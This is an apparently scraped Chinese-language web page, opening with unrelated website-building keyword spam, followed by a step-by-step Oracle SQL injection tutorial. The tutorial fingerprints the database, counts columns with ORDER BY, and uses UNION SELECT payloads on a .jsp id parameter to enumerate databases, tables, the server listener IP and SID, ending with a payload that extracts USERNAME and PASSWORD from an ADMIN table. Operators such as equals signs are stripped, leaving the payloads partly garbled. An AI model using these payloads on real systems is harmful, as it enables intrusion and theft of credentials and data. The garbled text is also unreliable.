合肥哪里有做网站,电子商务网站开发目标,网站栏目模块,石家庄现状1判断是什么数据库and exist(select * from dual)and exists(select * from user_tables)原理#xff1a;dual表和user_tables表是oracle中的系统表返回正常#xff0c;那么就可以肯定这是oracle。2查字段数order by 10-- //错误,列数小于10order by 3-- //正常,列数等于…1判断是什么数据库and exist(select * from dual)and exists(select * from user_tables)原理dual表和user_tables表是oracle中的系统表返回正常那么就可以肯定这是oracle。2查字段数order by 10-- //错误,列数小于10order by 3-- //正常,列数等于或大于33判断字段类型.jsp?id1 union select NULL,NULL,NULL from dual-- /*正常说明有3个字段*/and 12 union select NULL,NULL,string from dual-- //正常,第三个字段是字符型下面替换“string”记得带括号数据库与版本 (SELECT banner FROM sys.v_$version WHERE ROWNUM1)当前用户权限 (SELECT * FROM session_roles WHERE ROWNUM1)数据库名 (Select name From v$database)当前库所有表 (Select table_name From all_tables)服务器系统 (select member from v$logfile where rownum1)服务器监听IP (select utl_inaddr.get_host_address from dual)数据库SID (select instance_name from v$instance)4获取所有数据库名id1 and 12 union select NULL,(select global_name from global_name),NULL from dual--id1 and 12 union select NULL,(select sys.database_name from dual),NULL from dual--id1 and 12 union select NULL,(select name from v$database),NULL from dual--第一个库名id1 and 12 union select NULL,(select owner from all_tables where rownum1),NULL from dual--第二个库名id1 and 12 union select NULL,(select owner from all_tables where ownerSYS and rownum1),NULL from dual--第三个库名id1 and 12 union select NULL,(select owner from all_tables where ownerSYS and ownerSYSTEM and rownum1),NULL from dual--查到的第一个是SYS那么查第二个的时候就把SYS排除比如第二个查出的是SYSTEM那么第三个就排除前两个当前表名id1 and 12 union select NULL,(select table_name from user_tables where rownum1),NULL from dual--剩下的表名id1 and 12 union select NULL,(select table_name from user_tables where rownum1 and table_nameADMIN),NULL from dual--使用表名不断添加要排除的表名查询表名区分大小写。5查询字段内容id1 and 12 union select NULL,USERNAME,PASSWORD from ADMIN—
